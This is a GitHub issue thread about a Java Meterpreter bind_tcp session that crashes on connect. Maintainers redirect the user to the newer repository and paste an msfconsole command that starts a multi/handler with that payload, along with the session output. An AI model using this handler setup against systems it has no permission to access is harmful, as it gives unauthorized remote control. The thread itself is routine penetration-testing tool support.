rapid7 / meterpreter

THIS REPO IS OBSOLETE. USE https://github.com/rapid7/metasploit-payloads INSTEAD
Other
325 stars 144 forks source link

Java Shell Meterpreter Crash #185

Closed str4n63r closed 8 years ago

str4n63r commented 8 years ago

Till yesterday I was able to launch my java/meterpreter/bind_tcp shell without any problem. But suddenly when I tried today it's saying below message and crashing 😢

Upload appears to have been successful, waiting 30 seconds for deployment [] Meterpreter session 1 opened (Source-->Destination) at 2015-11-02 15:09:18 +0530 [] Executing payload, wait for session... [*] Meterpreter session 1 closed. Reason: Died Meterpreter session 1 is not valid and will be closed

Below are some details which might help you understand the scenario much better. Ruby Version: Ruby 2.1.5p273 (2014-11-13) Metasploit Version: Metasploit v4.11.4-2015102101 Contents of MSF/data/meterpreter: metsvc.exe, metsvc-server.exe

I'm unable to figure out why it's happening.

OJ commented 8 years ago

Hi @str4n63r, this repo isn't active any more. The Metasploit Payloads repository is where the Meterpreter action happens.

If you're looking for support, you're better off going to https://commuity.rapid7.com/ Thanks!

bcook-r7 commented 8 years ago

When you post a question, please mention what OS, remote java version, payload generation method, exploit, handler options, etc. you're using. I was not able to reproduce any problems locally, so the more detail the better:

./msfconsole -qx 'use exploit/multi/handler; set payload java/meterpreter/bind_tcp; set rhost 192.168.56.1; run'
payload => java/meterpreter/bind_tcp
rhost => 192.168.56.1
[*] Started bind handler
[*] Starting the payload handler...
[*] Sending stage (45744 bytes) to 192.168.56.1
[*] Meterpreter session 1 opened (192.168.56.1:49811 -> 192.168.56.1:4444) at 2015-11-02 09:05:49 -0600

meterpreter > sysinfo
Computer    : blah
OS          : Mac OS X 10.11.1 (x86_64)
Meterpreter : java/java